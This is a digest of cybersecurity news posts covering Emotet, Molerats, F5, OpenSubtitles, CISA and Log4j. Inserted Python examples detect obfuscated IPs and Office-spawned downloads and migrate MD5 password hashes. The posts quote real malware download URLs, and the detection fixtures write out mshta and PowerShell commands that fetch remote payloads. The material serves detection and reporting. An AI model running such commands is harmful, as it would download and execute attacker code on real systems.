Today — 24 January 2022 (Security Affairs)

Russian authorities arrested the kingpin of cybercrime Infraud Organization

24 January 2022 at 14:33

Russian authorities arrested four alleged members of the international cyber theft ring tracked as ‘Infraud Organization.’

In February 2018, the US authorities dismantled the global cybercrime organization tracked as Infraud Organization, which was involved in stealing and selling credit card and personal identity data.

The Justice Department announced indictments against 36 people charged with being part of the crime ring. The group had been active since 2010 and was created in Ukraine by Svyatoslav Bondarenko. According to the experts, the activities of the gang caused $530 million in losses.

Bondarenko remained at large, but Russian co-founder Sergey Medvedev was arrested by the authorities in 2018.

Most of the gang members were arrested in the US (30); the remaining members were from Australia, Britain, France, Italy, Kosovo, and Serbia.

The indicted leaders of the organization included people from the United States, France, Britain, Egypt, Pakistan, Kosovo, Serbia, Bangladesh, Canada and Australia.

The motto of the Infraud Organization was “In Fraud We Trust,” it has a primary role in the criminal ecosystem as a “premier one-stop shop for cybercriminals worldwide,” explained Deputy Assistant Attorney General David Rybicki.

The Infraud Organization used a number of websites to sell the data, running a classic and efficient e-commerce operation for stolen card and personal data, complete with a rating and feedback system and an “escrow” service for payments in digital currencies such as Bitcoin.

Last week, Russian authorities arrested Andrey Sergeevich Novak, an alleged leader of the gang. According to the TASS news agency, three other individuals (Kirill Samokutyaev, Konstantin Vladimirovich Bergman and Mark Avramovich Bergman) are under house arrest.

Russia’s FSB and law enforcement have detained four members of the Infraud Organization hacking group. Its purported founder Andrey Novak is wanted in the US on cybercrime charges. As a law enforcement source told TASS, Novak was arrested while the three other purported hackers are under house arrest.

“During intelligence-gathering activities, Russian special services with the operational support of the law enforcement and cooperation of the US law enforcement, managed to establish and detain four members of the Infraud Organization hacking group whose main income was the use of stolen credit card data.” reported TASS.

“The purported founder of the criminal group, Andrey Sergeevich Novak, wanted in the US on the accusations of cybercrime, has been arrested for two months, another three members of the group – Kirill Samokutyaev, Konstantin Vladimirovich Bergman and Mark Avramovich Bergman have been detained under a house arrest,” the source said.

Novak, aka “Unicc,” “Faaxxx,” and “Faxtrod,” will be tried in Russia and will not be extradited to the United States.

“According to an informed source, Russia is not planning to extradite Novak to the US. “Russian legislation prohibits an extradition of its citizens to a foreign state,” the source said. That said, if a foreign citizen wanted abroad is among the arrested, that individual will be extradited following the investigation and court proceedings in Russia, the source added.” continues the press agency.

Recently, the Russian Federal Security Service (FSB) announced that it had shut down the REvil ransomware gang, the group behind a long string of attacks against large organizations, such as Kaseya and JBS USA. The FSB claims to have identified all members of the REvil gang and monitored their operations.

The police operation was conducted by Russian authorities following a request by the United States that shared info about members of the gang.

The Russian police arrested 14 alleged members of the ransomware gang and raided 25 addresses seizing computer equipment and cryptocurrency wallets.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, cybercrime)

The post Russian authorities arrested the kingpin of cybercrime Infraud Organization appeared first on Security Affairs.

Emotet spam uses unconventional IP address formats to evade detection

24 January 2022 at 12:05

Experts warn of an Emotet malware campaign using “unconventional” IP address formats in an attempt to evade detection.

Threat actors behind a recent Emotet malware campaign have been observed using “unconventional” IP address formats to evade detection. Trend Micro researchers reported that the threat actors are using hexadecimal and octal representations of the IP address.

“We observed Emotet spam campaigns using hexadecimal and octal representations of IP addresses, likely to evade detection via pattern matching. Both routines use social engineering techniques to trick users into enabling document macros and automate malware execution. Upon receiving these standards, operating systems (OS) automatically convert the values to the dotted decimal quad representation to initiate the request from the remote servers.” reported Trend Micro.

The attack chain is the same used in previous campaigns: threat actors distribute the malware through weaponized Excel documents using Excel 4.0 macros, a dated feature used to automate repetitive tasks in the popular Office software.

Once the recipient is tricked into enabling document macros, the malicious code contacts a URL that is obfuscated with carets (“h^tt^p^:/^/0xc12a24f5/cc.html”), with the host written as a hexadecimal representation of the IP address, to execute HTML application (HTA) code from a remote host under the control of the attackers:

Emotet evasion technique

Experts pointed out that once executed, the macro also invokes cmd.exe, which launches mshta.exe with the URL as an argument to download and execute the HTA code from the remote host. This specific behavior can be used to detect the ongoing attack.

The researchers also spotted another variant of this malspam campaign that obfuscated the URL with carets but the IP contains an octal representation. Decoding the string “h^tt^p^:/^/0056.0151.0121.0114/c.html” into a dotted quad format we obtain 46[.]105[.]81[.]76.

“Moreover, the unconventional use of hexadecimal and octal IP addresses may result in evading current solutions reliant on pattern matching. But in the same vein, the unusual technique in the command lines can be used as a detection opportunity, with security teams using filters as leverage that can be enabled to treat such IP addresses as suspicious and associate them with malware.” concludes the report that also includes indicators of compromise for these attacks.
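The following is an added example (not code from the original post or from Trend Micro) of the detection opportunity the report points to. It undoes the caret obfuscation, normalises an IPv4 literal the way the operating system's inet_aton() does (hex, octal, decimal, and one to four dotted parts, including the single 32-bit integer form the article does not mention), and flags any command line whose URL host is not canonical dotted decimal. The sample command lines are constructed to mirror the two samples quoted above; the mshta/cmd wording and the decimal variant are assumptions.

```python
import re
from ipaddress import IPv4Address
from typing import Optional

# One dotted component in the notations the C inet_aton() family accepts:
# hex ("0xc1"), octal (leading zero, "0151") or plain decimal.
_PART = re.compile(r"(?P<hex>0[xX][0-9a-fA-F]+)|(?P<oct>0[0-7]*)|(?P<dec>[1-9][0-9]*)")
# scheme://host<rest>, applied after caret stripping; the host stops at '/' or ':'.
_URL = re.compile(r"(?P<scheme>[a-zA-Z][a-zA-Z0-9+.-]*)://(?P<host>[^/:\s]+)(?P<rest>\S*)")


def strip_carets(s: str) -> str:
    """Undo cmd.exe caret escaping: 'h^tt^p^:/^/' becomes 'http://'."""
    return s.replace("^", "")


def inet_aton_like(host: str) -> Optional[IPv4Address]:
    """Parse an IPv4 literal the way inet_aton() does.

    One to four dot-separated parts, each hex, octal or decimal; the last part
    fills every byte not covered by the leading parts ('0xc12a24f5' is a single
    four-byte part, '0xc1.0x2a24f5' is one byte plus three). Returns None for
    anything that is not such a literal (hostnames, out-of-range parts).
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        m = _PART.fullmatch(part)
        if m is None:
            return None
        base = 16 if m.group("hex") else 8 if m.group("oct") is not None else 10
        values.append(int(part[2:] if base == 16 else part, base))
    leftover_bits = 8 * (5 - len(values))            # bytes the last part spans
    if any(v > 0xFF for v in values[:-1]) or values[-1] >= (1 << leftover_bits):
        return None
    packed = 0
    for v in values[:-1]:
        packed = (packed << 8) | v
    return IPv4Address((packed << leftover_bits) | values[-1])


def analyze_cmdline(line: str) -> list:
    """One finding per URL in a process command line. A URL is flagged when the
    line used caret escaping or when its host is an IPv4 literal written in any
    form other than canonical dotted decimal."""
    carets = "^" in line
    findings = []
    for m in _URL.finditer(strip_carets(line)):
        host = m.group("host")
        ip = inet_aton_like(host)
        reasons = []
        if carets:
            reasons.append("caret-obfuscated command line")
        if ip is not None and host != str(ip):
            reasons.append(f"non-canonical IPv4 literal {host} -> {ip}")
        findings.append({"url": m.group(0), "host": host,
                         "ip": str(ip) if ip is not None else None,
                         "reasons": reasons, "suspicious": bool(reasons)})
    return findings


# Constructed command lines: the first two mirror the hex and octal samples
# quoted in the article, the third is the same host as a single 32-bit decimal,
# and the fourth is the canonical form that this check alone does not flag.
SAMPLE_CMDLINES = [
    r"cmd /c mshta h^tt^p^:/^/0xc12a24f5/cc.html",
    r"cmd /c mshta h^tt^p^:/^/0056.0151.0121.0114/c.html",
    r"mshta http://3240764661/cc.html",
    r"mshta http://193.42.36.245/cc.html",
]


def scan(lines=SAMPLE_CMDLINES) -> list:
    return [f for line in lines for f in analyze_cmdline(line)]


if __name__ == "__main__":
    for f in scan():
        print("ALERT" if f["suspicious"] else "ok   ", f["url"], f["ip"], "; ".join(f["reasons"]))
```

The normalised address is what should be matched against threat intelligence; the raw host string is only useful as a detection signal for the obfuscation itself, which is why the last sample is deliberately not flagged.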

The Emotet banking trojan has been active at least since 2014; the botnet is operated by a threat actor tracked as TA542. The infamous banking trojan was also used to deliver other malicious code, such as the Trickbot and QBot trojans, or ransomware such as Conti, ProLock, Ryuk, and Egregor.

In mid-November, researchers from multiple cybersecurity firms (Cryptolaemus, GData, and Advanced Intel) reported that threat actors were using the TrickBot malware to drop an Emotet loader on infected devices. The experts tracked the campaign aimed at rebuilding the Emotet botnet using TrickBot’s infrastructure as Operation Reacharound.

In December, the Emotet malware was observed directly installing Cobalt Strike beacons to give the attackers access to the target network.

Researchers from AdvIntel believe that the return will have a significant impact on the ransomware operations in the threat landscape, likely “the largest threat ecosystem shift in 2021” and beyond due to three reasons:

  1. Emotet’s unmatched continuous loader capabilities
  2. The correlation between these capabilities and the demands of the contemporary cybercrime market
  3. The return of the TrickBot-Emotet-Ransomware triad resulted from the first two points.

The Emotet botnet was resurrected by its former operator, who was convinced by the Conti ransomware gang. The shutdown of the Emotet operation resulted in the lack of high-quality initial access brokers.

Qbot and TrickBot used Emotet’s service to deploy multiple ransomware strains, including Conti, DoppelPaymer, Egregor, ProLock, Ryuk, and others.

The vacuum left by Emotet shutdown urged its resurgence, for this reason, its return will have a major impact on the threat landscape.


Crooks tampering with QR Codes to steal victim money and info, FBI warns

24 January 2022 at 06:40

The FBI warns that cybercriminals are using malicious QR codes to steal victims’ credentials and financial information.

The Federal Bureau of Investigation (FBI) published a public service announcement (PSA) to warn that cybercriminals are using QR codes to steal victims’ credentials and financial information.

QR codes are widely adopted by businesses to facilitate payment. In a classic use case, a business provides customers with a QR code directing them to a site where they can make a payment.

Crooks can replace the legitimate QR code with a tampered one and redirect the victim’s payment.

Unsuspecting people who scan the tampered QR codes are redirected to malicious websites crafted to steal login and financial information.

“cybercriminals are taking advantage of this technology by directing QR code scans to malicious sites to steal victim data, embedding malware to gain access to the victim’s device, and redirecting payment for cybercriminal use.” reads the FBI’s PSA. “Cybercriminals tamper with both digital and physical QR codes to replace legitimate codes with malicious codes. A victim scans what they think to be a legitimate code but the tampered code directs victims to a malicious site, which prompts them to enter login and financial information.”

Malicious websites could also deliver malware to the victims’ devices or redirect their payments to accounts under the attackers’ control.

“While QR codes are not malicious in nature, it is important to practice caution when entering financial information as well as providing payment through a site navigated to through a QR code,” the FBI states. 

The FBI announcement includes tips to protect people from such kind of attacks; feds recommend checking the URL obtained by scanning a QR code to make sure it is the intended site and looks authentic. Threat actors could use a malicious domain name that is similar to the intended URL but with typos or a misplaced letter.

Double-check any site navigated to from a QR code before providing login, personal, or financial information.

If scanning a physical QR code, ensure the code has not been tampered with, such as with a sticker placed on top of the original code.

Never download an app from a QR code. Avoid making any payment requested through an unsolicited email that uses social engineering techniques to trick recipients into scanning the embedded QR code.

Do not download a QR code scanner app from unofficial stores to avoid being infected with tainted apps, most phones today have a built-in scanner through the camera app.

If users receive a QR code from someone they know, they should contact that person via an alternative channel to verify that the code is really from them.

Never make payments through a site navigated to from a QR code, it is recommended to manually enter a known and trusted URL to complete the payment.

In November, the FBI Internet Crime Complaint Center (IC3) published an alert to warn the public of fraudulent schemes leveraging cryptocurrency ATMs and Quick Response (QR) codes to complete payment transactions. This payment option makes it very difficult to recover money stolen through such schemes.

QR codes can be used at cryptocurrency ATMs to transfer money to an intended recipient and crooks started using them to receive payments from victims.

Fraudulent schemes include online impersonation, in which the scammer poses as a familiar entity (e.g. the government, law enforcement, a legal office, or a utility company), romance scams, and lottery schemes (in which scammers attempt to convince victims that they have won an award).

In all these schemes, the scammers provide a QR code associated with the scammer’s cryptocurrency wallet that the victim has to use during the transaction. The victims are instructed to go to a physical cryptocurrency ATM, insert cash to purchase cryptocurrency, and then transfer it using the provided QR code.

In these schemes, the scammers are in constant online communication with the victims and provide step-by-step instructions to make the payment.


F5 fixes 25 flaws in BIG-IP, BIG-IQ, and NGINX products

24 January 2022 at 06:15

Cybersecurity provider F5 released security patches to address 25 vulnerabilities affecting its BIG-IP, BIG-IQ, and NGINX products.

Cybersecurity firm F5 announced security patches for 25 vulnerabilities affecting its BIG-IP, BIG-IQ, and NGINX products. Most of the vulnerabilities (23) addressed by the company affect the BIG-IP application delivery controller (ADC); 13 of them are rated high severity (CVSS score 7.5).

The issues were assigned CVE identifiers from CVE-2022-23010 through CVE-2022-23032.

The vulnerabilities can cause the termination of the Traffic Management Microkernel (TMM), can lead to an increase in memory resource utilization, freezing virtual servers, or executing JavaScript code.

F5 addressed the flaws with patched releases in the 14.x, 15.x, and 16.x branches.

The security provider also addressed two high-severity vulnerabilities in BIG-IQ centralized management and NGINX controller API management tracked as CVE-2022-23009 and CVE-2022-23008 respectively.

Regarding the CVE-2022-23008 flaw, an authenticated attacker with access to the ‘user’ or ‘admin’ role can use undisclosed API endpoints on NGINX Controller API Management to inject JavaScript code that is executed on managed NGINX data plane instances.

All the medium-severity vulnerabilities affect BIG-IP, and the CVE-2022-23023 issue also impacts BIG-IQ.

The company has also addressed a low-severity vulnerability, tracked as CVE-2022-23032, that can lead to a DNS rebinding attack.

The United States Cybersecurity and Infrastructure Security Agency (CISA) published a security advisory to encourage administrators to review the F5 security advisory.

“F5 has released its January 2022 Quarterly Security Notification addressing vulnerabilities affecting multiple versions of BIG-IP, BIG-IQ, and NGINX Controller API Management. A remote attacker could exploit these vulnerabilities to either deny service to, or take control of, an affected system.” reads the advisory published by CISA.

“CISA encourages users and administrators to review the F5 security advisory and install updated software or apply the necessary mitigations as soon as possible.”


Yesterday — 23 January 2022 (Security Affairs)

OpenSubtitles data breach impacted 7 million subscribers

23 January 2022 at 19:39

OpenSubtitles has suffered a data breach, the maintainers confirmed that the incident impacted 7 Million subscribers.

OpenSubtitles is a popular subtitles website; it suffered a data breach that affected 6,783,158 subscribers. Exposed data include email and IP addresses, usernames, the user’s country, and passwords stored as unsalted MD5 hashes.

The administrators of the website became aware of the hack after a hacker notified them via Telegram in August 2021 demanding the payment of a ransom. The attacker also offered to help OpenSubtitles address the security flaws he had found on the website. The administrators reluctantly agreed to pay the ransom, but after receiving it the attacker never helped them secure the website, and on 11 January 2022 the data was leaked online.

The hack is the result of poor cyber security since its launch in 2006, administrator OSS said. It seems that the threat actor exploited a SQL injection to access the database of the website.

“In August 2021 we received message on Telegram from a hacker, who showed us proof that he could gain access to the user table of opensubtitles.org, and downloaded a SQL dump from it.” reads a data breach notification published on the website. “He asked for a BTC ransom to not disclose this to public and promise to delete the data.

“We hardly agreed, because it was not low amount of money. He explained us how he could gain access, and helped us fix the error. On the technical side, he was able to hack the low security password of a SuperAdmin, and gained access to an unsecured script, which was available only for SuperAdmins. This script allowed him to perform SQL injections and extract the data.”

The financial data of the subscribers haven’t been compromised by the attacker.

Subscribers are recommended to change their opensubtitles.org, opensubtitles.com and forum passwords. Subscribers who reused their opensubtitles.org password elsewhere are recommended to change it there as well.

Administrators announced the improvement of the security of the website, including the introduction of new password policy.

“The site SHOULD be more secure now, we improved the way users are connecting to the site, the accounts will be locked after some successful logins, we introduced new password policy, we removed session info from table, IP should not be spoofable anymore, Captchas on login, register, password-reset, CSRF on forms, requests will be cancelled if admins change their IP during session, user passwords are saved in safe form using hash_hmac and sha256 algo with salt and pepper, all md5() passwords are deleted. For IT geeks – yes, we are using password_hash(), with peppered sha256 password, BCRYPT and for verification password_verify()” concludes the notification. “Note that our new site, opensubtitles.com was built with stronger security concerns, and already included all the points described above.”
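The migration the notice describes, from unsalted MD5 to a peppered SHA-256 pre-hash fed into a salted slow hash, as an added example that is not OpenSubtitles’ code. It is written in Python rather than the site’s PHP, and PBKDF2-HMAC-SHA256 from the standard library stands in for the bcrypt they adopted (an assumption, chosen so the example has no third-party dependency); the pepper value, user rows and passwords are constructed. It also shows the rehash-on-login step that lets the MD5 column be dropped afterwards.

```python
import hashlib
import hmac
import os

# Server-side secret ("pepper"). In production it lives in a KMS or the
# environment, never in the user table; this value is constructed for the example.
PEPPER = b"example-pepper-not-for-production"
# Cost of the slow hash; tune so one verification takes ~100 ms on your hardware.
ROUNDS = 100_000


def legacy_md5(password: str) -> str:
    """The broken scheme the site started with: unsalted MD5, so equal passwords
    give equal hashes and one precomputed table applies to every row at once."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def _prehash(password: str) -> bytes:
    """HMAC-SHA256 under the pepper, the 'peppered sha256' step from the notice.
    It also fixes the slow-hash input at 32 bytes, which sidesteps bcrypt's
    72-byte truncation when bcrypt is the slow hash."""
    return hmac.new(PEPPER, password.encode("utf-8"), hashlib.sha256).digest()


def hash_password(password: str) -> str:
    """Per-user random salt plus a slow hash over the peppered pre-hash.
    PBKDF2-HMAC-SHA256 stands in for bcrypt here (assumption)."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", _prehash(password), salt, ROUNDS)
    return f"pbkdf2_sha256${ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    rounds, salt, dk = int(parts[1]), bytes.fromhex(parts[2]), bytes.fromhex(parts[3])
    return hmac.compare_digest(hashlib.pbkdf2_hmac("sha256", _prehash(password), salt, rounds), dk)


def login_and_migrate(users: dict, username: str, password: str) -> bool:
    """Verify against whichever scheme the row holds. A successful login against
    an MD5 row rewrites it in the new format, so the MD5 column can be dropped
    once every active user has logged in; inactive rows should be reset, not kept."""
    row = users.get(username)
    if row is None:
        hash_password(password)          # spend the same time as a real check
        return False
    if row["scheme"] == "md5":
        if not hmac.compare_digest(legacy_md5(password), row["hash"]):
            return False
        users[username] = {"scheme": "pbkdf2_sha256", "hash": hash_password(password)}
        return True
    return verify_password(password, row["hash"])


def build_sample_users() -> dict:
    """Constructed rows. alice and bob share a password: under MD5 the two rows
    are byte-identical, which is the property the leak made exploitable."""
    return {
        "alice": {"scheme": "md5", "hash": legacy_md5("winter2021")},
        "bob":   {"scheme": "md5", "hash": legacy_md5("winter2021")},
        "carol": {"scheme": "pbkdf2_sha256", "hash": hash_password("correct horse battery")},
    }
```

Keeping the pepper out of the database means a future SQL dump alone is not enough to start cracking; the salt in each row means that even identical passwords no longer produce identical hashes.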

Subscribers can check if their data have been exposed by querying the data breach notification website Have I Been Pwned that received the list of compromised users.


US CISA added 17 flaws to its Known Exploited Vulnerabilities Catalog

23 January 2022 at 18:13

US CISA added seventeen new actively exploited vulnerabilities to the ‘Known Exploited Vulnerabilities Catalog’.

The ‘Known Exploited Vulnerabilities Catalog’ is a list of known vulnerabilities that threat actors have abused in attacks and that are required to be addressed by Federal Civilian Executive Branch (FCEB) agencies.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Known Exploited Vulnerabilities Catalog and address the vulnerabilities in their infrastructure.

The Cybersecurity and Infrastructure Security Agency (CISA) this week added seventeen actively exploited vulnerabilities to the Catalog.

The total number of vulnerabilities included in the catalog reached 341 this week.

CISA is requiring nine of the 17 vulnerabilities added this week to be addressed by February 1, 2022, and one (CVE-2021-35247) by February 4, 2022; the remaining seven have due dates in July 2022.

CVE Number     | Title                                                                                   | Due Date
CVE-2021-32648 | October CMS Improper Authentication                                                     | 02/01/2022
CVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability                  | 02/01/2022
CVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability            | 02/01/2022
CVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability                                | 02/01/2022
CVE-2021-25296 | Nagios XI OS Command Injection Vulnerability                                            | 02/01/2022
CVE-2021-25297 | Nagios XI OS Command Injection Vulnerability                                            | 02/01/2022
CVE-2021-25298 | Nagios XI OS Command Injection Vulnerability                                            | 02/01/2022
CVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability                          | 02/01/2022
CVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability                           | 02/01/2022
CVE-2021-35247 | SolarWinds Serv-U Improper Input Validation Vulnerability                               | 02/04/2022
CVE-2020-11978 | Apache Airflow Command Injection Vulnerability                                          | 07/18/2022
CVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability                                   | 07/18/2022
CVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability                     | 07/18/2022
CVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability  | 07/18/2022
CVE-2006-1547  | Apache Struts 1 ActionForm Denial of Service Vulnerability                              | 07/21/2022
CVE-2012-0391  | Apache Struts 2 Improper Input Validation Vulnerability                                 | 07/21/2022
CVE-2018-8453  | Microsoft Windows Win32k Privilege Escalation Vulnerability                             | 07/21/2022

One of the issues added this week is a vulnerability in the October CMS, tracked as CVE-2021-32648, which was recently exploited in attacks against websites of the Ukrainian government.

CISA also added a vulnerability, tracked as CVE-2021-35247, recently addressed by SolarWinds in its Serv-U products, which threat actors are actively exploiting in the wild. The company pointed out that all the attack attempts observed so far failed.


Molerats cyberespionage group uses public cloud services as attack infrastructure

23 January 2022 at 14:41

Cyberespionage group Molerats has been observed abusing legitimate cloud services, like Google Drive and Dropbox as attack infrastructure.

Zscaler ThreatLabz analyzed an active espionage campaign carried out by Molerats cyberespionage group (aka TA402, Gaza Hackers Team, Gaza Cybergang, and Extreme Jackal) that abuses legitimate cloud services like Google Drive and Dropbox as attack infrastructure. Public cloud services are used to host malicious payloads or for command-and-control infrastructure in attacks aimed at targets across the Middle East.

In December 2021, ThreatLabz researchers identified several macro-based MS Office files that were used in attacks against entities in the Middle East. The bait files were employed in cyber espionage attacks; they contain decoy themes related to the geopolitical conflict between Israel and Palestine. Similar bait files were also used in previous cyberespionage campaigns attributed to the Molerats APT group.

Molerats is an Arabic-speaking, politically motivated hacking group that has been active since 2012.

The researchers discovered that the current campaign has been active since July 2021, the threat actors switched the distribution method in December 2021 and applied minor changes in the .NET backdoor.

“The targets in this campaign were chosen specifically by the threat actor and they included critical members of banking sector in Palestine, people related to Palestinian political parties, as well as human rights activists and journalists in Turkey.” reads the analysis published by Zscaler.

The macro code embedded in the weaponized decoy document simply executes a command via cmd.exe, which in turn runs a PowerShell command to download the stage-2 payload from the URL (“http://45.63.49[.]202/document.html”) and drop it at the path “C:\ProgramData\document.htm”.

It then renames document.htm to servicehost.exe and executes it.

Molerats APT attacks

The .NET-based malware masquerades as a WinRAR application by using its icon and other resources, and is obfuscated using the ConfuserEx packer.
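A detection for the delivery chain just described, as an added example that is not part of the Zscaler analysis or the original post. It walks constructed Sysmon-style process-creation events and raises two findings: an Office application spawning a shell whose command line runs PowerShell with a URL and a write under C:\ProgramData, and an executable launched from C:\ProgramData with an Office process somewhere in its ancestry. The event layout, the exact PowerShell download syntax and the field names are assumptions; the download host uses an RFC 5737 documentation address in place of the IP quoted above.

```python
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed Sysmon-style process-creation events reproducing the chain in the
# write-up: Word -> cmd.exe -> PowerShell download into C:\ProgramData, then the
# renamed payload executing from there. The host is an RFC 5737 documentation
# address standing in for the IP quoted in the analysis.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n decoy.doc"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c powershell -w hidden (New-Object Net.WebClient).DownloadFile("http://198.51.100.7/document.html","C:\ProgramData\document.htm")'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden (New-Object Net.WebClient).DownloadFile(...)"},
    {"pid": 400, "ppid": 200, "image": r"C:\ProgramData\servicehost.exe", "cmdline": "servicehost.exe"},
    # Benign baseline: a user shell under explorer.exe.
    {"pid": 500, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c dir"},
]


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def ancestors(by_pid: dict, pid: int) -> list:
    """Walk ppid links upward, stopping on unknown pids or a cycle."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events: list) -> list:
    """Return (rule, pid) pairs. Rule 1: an Office app spawning a shell whose
    command line runs PowerShell, contains a URL and writes under ProgramData.
    Rule 2: an executable running from C:\\ProgramData with an Office ancestor."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"].lower()
        if (name in SHELLS and parent_name in OFFICE_APPS and "powershell" in cmd
                and URL_RE.search(cmd) and "\\programdata\\" in cmd):
            alerts.append(("office_shell_download_to_programdata", e["pid"]))
        if (e["image"].lower().startswith("c:\\programdata\\") and name.endswith(".exe")
                and any(basename(a["image"]) in OFFICE_APPS for a in ancestors(by_pid, e["ppid"]))):
            alerts.append(("programdata_exec_with_office_ancestor", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 2 is the more durable of the two: it does not depend on the download syntax, only on where the payload runs from and who launched it, so it survives the kind of minor changes in delivery the researchers describe between the old and new chains.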

The backdoor performs the following operations:

1. Collects the machine manufacturer and model information using WMI; this is used for execution-environment checks and is later exfiltrated to the C2 server.
2. Checks whether it should execute in the current execution environment.
3. Creates a mutex named after the executing binary.
4. Checks whether the mutex was created successfully.
5. Determines whether it is being executed for the first time using the registry key value “HKCU/Software/{name_of_executing_binary}/{name_of_executing_binary}”.
6. If the registry key doesn’t exist, the code flow goes through a mouse-check function which continues execution only if it detects a change in either of the mouse cursor coordinates. At the end, the mouse-check function also creates the same registry key.

The backdoor supports multiple capabilities, such as taking snapshots, listing and uploading files, and running arbitrary commands on the compromised system.

“The major difference between the new attack chain and the old attack chain is seen in the backdoor delivery. Although we are not sure how these RAR/ZIP files were delivered but considering the past attacks they were likely delivered using Phishing PDFs. Additionally, we found a minor variation in the way the backdoor extracted the primary Dropbox account token.” Zscaler ThreatLabz researchers conclude.


Security Affairs newsletter Round 350

23 January 2022 at 08:57

A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

If you want to also receive for free the newsletter with the international press subscribe here.

Pay attention to Log4j attacks, Dutch National Cybersecurity Centre (NCSC) warns
Vulnerabilities in Control Web Panel potentially expose Linux Servers to hack
US Treasury Department sanctions 4 Ukrainian officials for working with Russian intelligence
A bug in McAfee Agent allows running code with Windows SYSTEM privileges
Experts warn of anomalous spyware campaigns targeting industrial firms
Google Project Zero discloses details of two Zoom zero-day flaws
MoonBounce UEFI implant spotted in a targeted APT41 attack
Conti ransomware gang started leaking files stolen from Bank Indonesia
FBI links the Diavol ransomware to the TrickBot gang
Cisco StarOS flaws could allow remote code execution and information disclosure
Crypto.com hack impacted 483 accounts and resulted in a $34 million theft
Red Cross hit by a sophisticated cyberattack
New BHUNT Stealer targets cryptocurrency wallets
SolarWinds Serv-U bug exploited by threat actors in the wild, Microsoft warns
New DDoS IRC Bot distributed through Korean webHard platforms
UK NCSC shares guidance for organizations to secure their communications with customers
CISA warns of potential critical threats following attacks against Ukraine
Box flaw allowed to bypass MFA and takeover accounts
Is White Rabbit ransomware linked to FIN8 financially motivated group?
AlphV/BlackCat ransomware gang published data stolen from fashion giant Moncler
Financially motivated Earth Lusca threat actors targets organizations worldwide
Law enforcement shutdown the VPN service VPNLab used by many cybercriminal gangs
Microsoft releases Windows out-of-band emergency fixes for Win Server, VPN issues
A small number of Crypto.com users reported suspicious activity on their wallet
Oracle Critical Patch Update for January 2022 will fix 483 new flaws
Zoho fixes a critical vulnerability (CVE-2021-44757) in Desktop Central solutions
High-Severity flaw in 3 WordPress plugins impacts 84,000 websites
Experts warn of attacks using a new Linux variant of SFile ransomware
Kyiv blames Belarus-linked APT UNC1151 for recent cyberattack
European Union simulated a cyber attack on a fictitious Finnish power company
Microsoft spotted a destructive malware campaign targeting Ukraine
A new wave of Qlocker ransomware attacks targets QNAP NAS devices
Threat actors stole $18.7M from the Lympo NFT platform


Before yesterday (Security Affairs)

Pay attention to Log4j attacks, Dutch National Cybersecurity Centre (NCSC) warns

22 January 2022 at 20:34

The Dutch National Cybersecurity Centre (NCSC) warns organizations of risks associated with cyberattacks exploiting the Log4J vulnerability.

The Dutch National Cybersecurity Centre (NCSC) warns organizations to remain vigilant on possible attacks exploiting the Log4J vulnerability.

According to the Dutch agency, threat actors will continue to attempt to exploit the Log4Shell flaw in future attacks.

“Partly due to the rapid actions of many organizations, the extent of active abuse appears to be not too bad at the moment. But that doesn’t mean it stops there. It is expected that malicious parties will continue to search for vulnerable systems and carry out targeted attacks in the coming period. It is therefore important to remain vigilant.” states the Dutch NCSC agency. “The NCSC advises organizations to continue to monitor whether vulnerable systems are used and to apply updates or mitigating measures where necessary. In addition, the NCSC advises directors to stay alert by informing themselves about Log4j and the possible impact of abuse on business continuity.”

The risk that cybercriminal groups and nation-state actors could exploit Log4j vulnerabilities in future attacks is still high.

Recently Microsoft posted a warning about a new campaign from a China-based actor it tracks as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed on the internet, and deploy Night Sky ransomware.

In recent weeks other ransomware gangs have exploited Log4Shell in their attacks; the Conti ransomware gang was the first group to exploit the CVE-2021-44228 flaw, starting in mid-December.

In the same period, Bitdefender researchers discovered that threat actors were attempting to exploit the Log4Shell vulnerability to deliver the new Khonsari ransomware on Windows machines.

